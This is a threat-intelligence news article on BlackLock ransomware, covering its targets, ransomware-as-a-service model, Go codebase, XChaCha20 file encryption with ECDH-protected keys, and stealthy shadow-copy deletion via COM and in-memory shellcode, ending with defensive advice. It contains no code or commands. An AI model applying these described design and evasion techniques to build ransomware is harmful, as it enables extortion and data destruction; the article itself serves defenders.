BlackLock Ransomware: New Cross-Platform Threat Targets Windows, Linux, and VMware
The BlackLock group, formerly known as El Dorado, has in recent months established itself as one of the most prominent actors in the ransomware arena. Research by the AhnLab Security Intelligence Center (ASEC) reveals that its developers have engineered a cross-platform encryption tool designed to simultaneously target Windows, Linux, and VMware ESXi systems. Such versatility allows operators to strike at mixed infrastructures without being confined to a single operating system.
Data leaks posted on BlackLock’s dedicated site first surfaced in the summer of 2024, though forensic traces suggest that activity has been ongoing since at least March of that year. The majority of recorded incidents involved companies and municipal organizations in the United States, but attacks have also been documented in South Korea, Japan, several European nations, and beyond.
Victims have included educational and research institutions, transportation providers, construction and manufacturing firms, and even leisure venues such as golf clubs. According to ASEC, the group operates under a “ransomware-as-a-service” model.
BlackLock’s technical foundation is written in Go, leveraging standard libraries to streamline development and ensure stability. On execution, the program parses command-line arguments, enabling operators to fine-tune its behavior — selecting directories to encrypt, setting delays, defining partial encryption percentages, adjusting thread counts, and scanning remote SMB shares. While the code includes a flag for VMware-specific attacks, this module has not yet been fully implemented in the analyzed samples.
At its core, the malware employs the ChaCha20 stream cipher, implemented via Go’s crypto package. For each file, it generates a unique 32-byte key and a 24-byte initialization vector, then invokes XChaCha20 to perform encryption using the XORKeyStream function.
To guarantee data recovery after ransom payment, encrypted metadata containing the file’s key and initialization vector is appended to each file. These values are protected using Elliptic Curve Diffie-Hellman key exchange combined with secretbox.Seal(), effectively preventing the extraction of working keys without the operators’ private component.
Particularly notable is its method for removing backups. Instead of issuing direct WMI commands, the malware creates a COM object and executes in-memory shellcode to delete Volume Shadow Copy snapshots and purge the recycle bin. This stealthier approach hinders detection and helps bypass traditional monitoring tools. Ultimately, victims are left with files renamed to random extensions and ransom notes titled HOW_RETURN_YOUR_DATA.TXT in every directory, threatening business disruption and data publication if negotiations are refused.
Analysis underscores that BlackLock is evolving toward greater flexibility and internal sophistication. Defensive strategies must therefore include network segmentation, timely patching, multi-layered protection, and rigorous testing of backups stored in isolated environments. As ransomware increasingly targets Windows, Linux, and ESXi alike, only a blend of proactive safeguards and rapid incident response can mitigate the devastating impact of this family of attacks.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
